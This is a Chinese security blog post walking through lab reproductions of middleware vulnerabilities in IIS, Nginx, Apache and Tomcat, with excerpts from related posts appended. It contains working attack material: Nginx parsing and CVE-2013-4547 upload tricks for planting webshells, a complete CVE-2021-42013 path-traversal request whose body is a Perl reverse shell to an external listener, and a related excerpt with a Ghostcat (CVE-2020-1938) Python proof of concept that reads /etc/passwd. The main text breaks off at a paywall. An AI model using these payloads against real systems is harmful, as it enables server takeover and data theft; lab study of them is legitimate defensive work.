中间件安全-CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

原创 已于 2023-10-20 16:35:56 修改 · 2.2k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#中间件 #apache #网络安全 #web安全 #nginx #tomcat

于 2023-10-20 16:35:06 首次发布
本文聚焦中间件安全,涉及IIS、Nginx、Apache、Tomcat等中间件。详细阐述各中间件存在的安全问题,如Nginx的解析与文件名逻辑漏洞、Apache的RCE及目录遍历漏洞、Tomcat的弱口令与文件上传漏洞等,并给出对应漏洞复现步骤及部分修复方案。

目录

中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现

中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等

1、中间件-IIS-短文件&解析&蓝屏等

2、中间件-Nginx-文件解析&命令执行等

3、中间件-Apache-RCE&目录遍历&文件解析等

4、中间件-Tomcat-弱口令&文件上传&文件包含等

中间件-IIS安全问题

中间件-IIS-短文件&解析&蓝屏等安全问题:

1、短文件:信息收集

2、文件解析

3、HTTP.SYS:蓝屏崩溃,略有破坏性

4、CVE-2017-7269 条件比较老旧

中间件-Nginx安全问题

Nginx详解

Nginx是一款轻量级的Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行。其特点是占有内存少,并发能力强,事实上nginx的并发能力在同类型的网页服务器中表现较好。

中间件-Nginx-文件解析&命令执行等安全问题:

1、后缀解析 文件名解析 配置不当:该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 CVE-2013-4547:影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

2、cve_2021_23017

相关文章:cve_2021_23017

3、cve_2017_7529

相关文章:cve_2017_7529

漏洞复现

Nginx 解析漏洞复现

靶场:vulhub

参考:nginx解析漏洞复现

开启环境:

image-20231020095152751

访问:

image-20231020095433095

上传:

上传一个正常的图片,图片当中带着我们的php语句

image-20231020095802615

访问图片,在图片后面加上/.php

语句被成功解析并执行:

image-20231020095849687

可利用此来上传木马,从而进行getshell。

Nginx 文件名逻辑漏洞

漏洞原理:

主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致出现权限绕过、代码执行的连带影响。

靶场:vulhub

参考:CVE-2013-4547

开启环境:

image-20231020101837154

访问:

image-20231020101852721

上传.gif文件

这个环境是黑名单验证,我们无法上传php后缀的文件。我们上传一个“1.gif ”,注意后面的空格:

image-20231020102007421

访问http://your-ip:8080/uploadfiles/3.gif[0x20][0x00].php,即可发现php语句已被解析执行(当做php脚本语言进行执行):

image-20231020102125867

修改16进制数值:

image-20231020102209314

解析执行:

image-20231020101820925

同理利用该漏洞,上传木马,可getshell。

中间件-Apache-RCE&目录遍历&文件解析等安全问题漏洞复现

详解:Apache详解

Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python解释器编译到服务器中。

安全问题:

1、cve_2021_42013 RCE代码执行

2、cve_2021_41773 目录穿越

3、cve-2017-15715 文件解析

漏洞复现

CVE_2021_42013 RCE代码执行(Apache RCE)

描述:

Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。

靶场:vulfocus

开启靶场:

image-20231020104037783

访问:

image-20231020104123013

payload:
//修改请求方式为POST
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
//数据包内容为:
echo;perl -e 'use Socket;$i="192.168.100.1";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'


//完整数据包:
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1
Host: 192.168.100.134:11559
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

echo;perl -e 'use Socket;$i="192.168.100.1";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

反弹shell命令:
echo;perl -e
最低0.47元/天 解锁文章
Apache 中间件漏洞(换行解析)详解
xinyue9966的博客
02-17 4186
介绍 Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。 简而言之,Apache服务器不仅简单好用,还能支持HTML、PHP、Perl、Python等基础语言。 目录介绍 bin-------存放常用的命令工具,例如httpd cgi-bin---存放Linux下常用的命令,例如xxx.sh co
第59天-服务攻防-中间件安全&CVE 复现&IIS&Apache&Tomcat&Nginx
weixin_52529261的博客
02-07 1327
本文章涉及ApacheTomcatNginx中间件重要的CVE漏洞复现
中间件安全apachetomcat
weixin_65049289的博客
03-31 2407
中间件漏洞利用
服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现
ranzi.
05-13 3399
ISS中间件(Internet Security and Acceleration Server Middleware)是微软公司推出的一种安全中间件,旨在提供高效的安全代理服务和网络加速功能。它是Microsoft Proxy Server和Microsoft Firewall产品的继承者,也是Microsoft Forefront TMG(Threat Management Gateway)的前身。
Nginx 升级实战:修复 CVE-2025-23419 漏洞、隐藏版本号与多场景升级步骤
最新发布
weixin_66855479的博客
10-13 1946
前言:Nginx 作为全球广泛使用的高性能 Web 服务器与反向代理工具,其安全性和隐蔽性直接关系到业务系统的稳定运行。近期爆出的 `Nginx 证书认证绕过漏洞CVE-2025-23419)`,要求我们必须将 Nginx 升级到 `1.27.0` 及以上版本才能修复;同时,隐藏 Nginx 版本号能大幅降低被攻击者“针对性利用漏洞”的风险。但实际运维中,不同 Linux 发行版(如 CentOS、Ubuntu)、不同安装方式(源码编译、包管理器安装)下,Nginx 的升级步骤差异显著。更棘手的是,像 C
第59天:服务攻防-中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx
weixin_71529930的博客
04-13 1342
war文件是一种web应用程序格式,包含了一个项目中所有源码的集合并按一定的目录结构组织,由于将所有文件合并成一个文件,因此节省了文件的传输时间。发送到repeater,文章末尾加入,php代码,右侧可以看到上传路径。利用icon目录必须是一个真实存在的目录,%2e为 "."如果cgi和cgid模块被设置了,那么可以进行命令执行。访问大马 根目录/jshell/jshell.jsp。找一个jsp编写的大马,把他压缩为war后缀的。搭建起来以后,抓包,put方式上传。上传php文件,会显示不能上传。
中间件安全-CVE复现&Weblogic&Jenkins&GlassFish漏洞复现
网络空间安全学习
10-22 1595
中间件及框架列表: IISApacheNginxTomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。,达到产品级质量,可免费用于开发、部署和重新分发。JBoss是一个管理。
DAY79服务攻防-中间件安全&IIS&Apache&Tomcat&Nginx&弱口令&不安全配置&CVE
m0_74402888的博客
09-23 1418
Apache HTTP Server 2.4.49、2.4.50版本对路径规范化所做的更改中存在一个路径穿越漏洞,攻击者可利用该漏洞读取到Web目录外的其他文件,如系统配置文件、网站源码等,甚至在特定情况下,攻击者可构造恶意请求执行命令,控制服务器。漏洞利用条件:安装了IIS6.0以上的Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2版本。
框架安全-CVE 复现&Apache Shiro&Apache Solr漏洞复现
网络空间安全学习
11-02 2157
Solr 是一个高性能,采用 Java5 开发。Solr 任意文件读取该漏洞是由于没有对输入的内容进行校验,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行SSRF攻击,最终造成任意读取服务器上的文件。 中间件IISApacheNginxTomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,Flask,jQuery 等。
nginx cve-2023-4547超简单超详细的保姆级教程
2301_76467680的博客
07-05 369
抓包上传后缀为.jpg.php的文件(这里我先上传的是php文件里面写的一句话木马结果不成功之后图片码jpg还是不行于是才联合使用)jpg后面加两个空格(这里使用空格绕过)将空格的20改为00。
Nginx文件名逻辑漏洞CVE-2013-4547)
haha1314的博客
07-15 1897
Nginx文件名逻辑漏洞CVE-2013-4547) 漏洞说明 影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 我们只需要上传一个空格结尾的文件,即可使PHP解析之。 我们可以请求如下URI:/test[0x20]/../admin/index.php,这个URI不会匹配上location后面的/admin/,也就绕过了其中的IP验证;但最后请求的是/test...
Nginx 文件名逻辑漏洞CVE-2013-4547)(Vulhub)
weixin_74985952的博客
06-20 529
Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本中存在错误解析用户请求的url信息,从而导致文件代码执行,权限绕过等问题。利用该漏洞需要满足Nginx版本满足0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7版本文件上传点可以上传带空格文件名的文件服务器没有做文件重命名。
Nginx 文件名逻辑漏洞CVE-2013-4547)复现。 新手向。小白也能听得懂的。面向小白详细讲解。配合BurpSuite新老版本抓包。
qq_24305079的博客
06-18 2132
Nginx 文件名逻辑漏洞CVE-2013-4547),记录一下我的学习过程,总结一下经验,希望能给后面的人提供帮助,为了复现和成功解析PHP网页我搞了很久.我这里使用了新老版本的BurpSuite去抓包,详细过程请见下文.使用的BurpSuite版本:和CentOS 7Kali 1.0.5Vulhub预防CVE-2013-4547漏洞需要从配置和安全实践上进行多方面的改进。
nginx HTTP2 Flood漏洞分析(CVE-2018-16843,CVE-2018-16844)
朝夕闻道
11-11 8219
2018年11月6日,http://nginx.org/公布了两个安全公告,涉及到HTTP/2和MP4两个模块。 2018-11-06 nginx-1.14.1stable andnginx-1.15.6mainline versions have been released, with fixes forvulnerabilities in HTTP/2(CVE-20...
CVE-2024-23017:nginx DNS解析漏洞PoC公开(1)
2401_86951255的博客
09-11 1190
ngx_resolver_copy()会被调用以验证和解压缩DNS响应中包含的每个DNS域名,接收作为输入的网络包和指向正在处理的域名的指针,并在成功时返回指向包含未压缩域名的新分配缓冲区的指针。如果计算出的大小正好与堆块大小对齐,则写入的点字符超出边界,将覆盖下一个堆块大小元数据的最低有效字节。第1部分中的大小计算和第2部分中的域名解压之间的不匹配会导致len中的off-by-one错误,从而允许在name->data数据边界之外写入一个点字符。分配一个输出缓冲区,并将未压缩的域名复制到其中。
CVE-2019-11043 Nginx配置详解
永远是少年
12-11 1176
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-11043 Nginx配置详解。 一、Nginx处理PHP文件与Fastcgi 二、Nginx配置中location相关含义 三、CVE-2019-11043漏洞原因
API安全产品,面试官都被搞懵了
2401_83974173的博客
04-13 831
这些策略通常会结合使用,以提高产品在市场中的知名度和竞争力。
基于补丁方式修复 nginx漏洞 缓冲区错误漏洞(CVE-2022-41741)、越界写入漏洞CVE-2022-41742)
热门推荐
阿松哥哥2018的博客
03-20 1万+
基于补丁方式修复 nginx漏洞 缓冲区错误漏洞(CVE-2022-41741)、越界写入漏洞CVE-2022-41742)
tomcat-ajp-cve-2020-1938 漏洞复现
04-05
### Tomcat AJP CVE-2020-1938 漏洞复现方法与攻击原理 #### 背景介绍 Tomcat AJP 协议中的文件包含漏洞CVE-2020-1938)允许攻击者通过构造恶意请求来读取服务器上的任意文件。此漏洞源于 AJP 协议处理不当,可能导致敏感数据泄露甚至远程代码执行。 --- #### 攻击原理 AJP 是一种二进制通信协议,用于在 Web 服务器(如 Apache HTTP Server)和应用服务器(如 Tomcat)之间传输数据。当启用 AJP 连接器时,如果未正确配置权限控制,则可能被滥用以访问受保护资源。具体来说,攻击者可以通过发送特殊格式的 AJP 请求到默认端口 `8009` 来触发漏洞[^2]。 --- #### 环境搭建 为了重现该漏洞,可以使用 Docker 镜像快速部署易受影响版本的 Tomcat 实例: ```bash docker pull duonghuuphuc/tomcat-8.5.32 docker run -d --name vulnerable-tomcat -p 8080:8080 -p 8009:8009 duonghuuphuc/tomcat-8.5.32 ``` 上述命令会启动一个带有已知漏洞Tomcat 容器实例,并映射必要的端口以便测试[^3]。 --- #### 利用工具准备 目前有多个开源项目可用于检测和利用此漏洞,以下是常用的两种方式: 1. **Ghostcat 工具** Ghostcat 提供了一个简单的界面来进行漏洞扫描和验证。可以从其官方仓库下载并运行: ```bash git clone https://github.com/00theway/Ghostcat-CNVD-2020-10487.git cd Ghostcat-CNVD-2020-10487 python ghostcat.py http://<target-ip>:8009/ ``` 如果目标主机存在漏洞,工具将返回指定路径的内容[^4]。 2. **自定义 Python 脚本** 下面是一个基于 CNVD 的 PoC 脚本示例,可以直接修改后使用: ```python import socket def send_ajp_request(ip, port=8009, filename="/etc/passwd"): packet = b'\x12\x34\x00\x02\xfd\x00\x00\x00\x00\x00\xbb\x02\x4e' \ b'\x00\x00\x00\x01\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ b'\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff' \ f'{filename}'.encode() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((ip, port)) sock.send(packet) response = sock.recv(1024).decode('utf-8', errors='ignore') if 'root:' in response: print("[+] Vulnerable! File content:") print(response.strip()) else: print("[-] Not vulnerable or file not found.") except Exception as e: print(f"[!] Error occurred: {str(e)}") finally: sock.close() if __name__ == "__main__": target_ip = input("Enter the IP address of the target server: ") send_ajp_request(target_ip) ``` 此脚本尝试连接至目标机器的 AJP 端口,并请求 `/etc/passwd` 文件内容作为演示[^1]。 --- #### 结果分析 一旦成功获取预期文件内容(例如 Linux 系统用户的密码列表),即可确认目标系统受到 CVE-2020-1938 影响。需要注意的是,在实际渗透测试过程中应严格遵循法律规范,仅针对授权范围内的资产操作。 --- #### 补救措施 为了避免此类风险,建议采取以下防护手段之一或组合实施: - 关闭不必要的 AJP 功能; - 使用防火墙限制对 AJP 端口的外部访问; - 更新至最新稳定版 Tomcat 并重新评估安全性设置。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值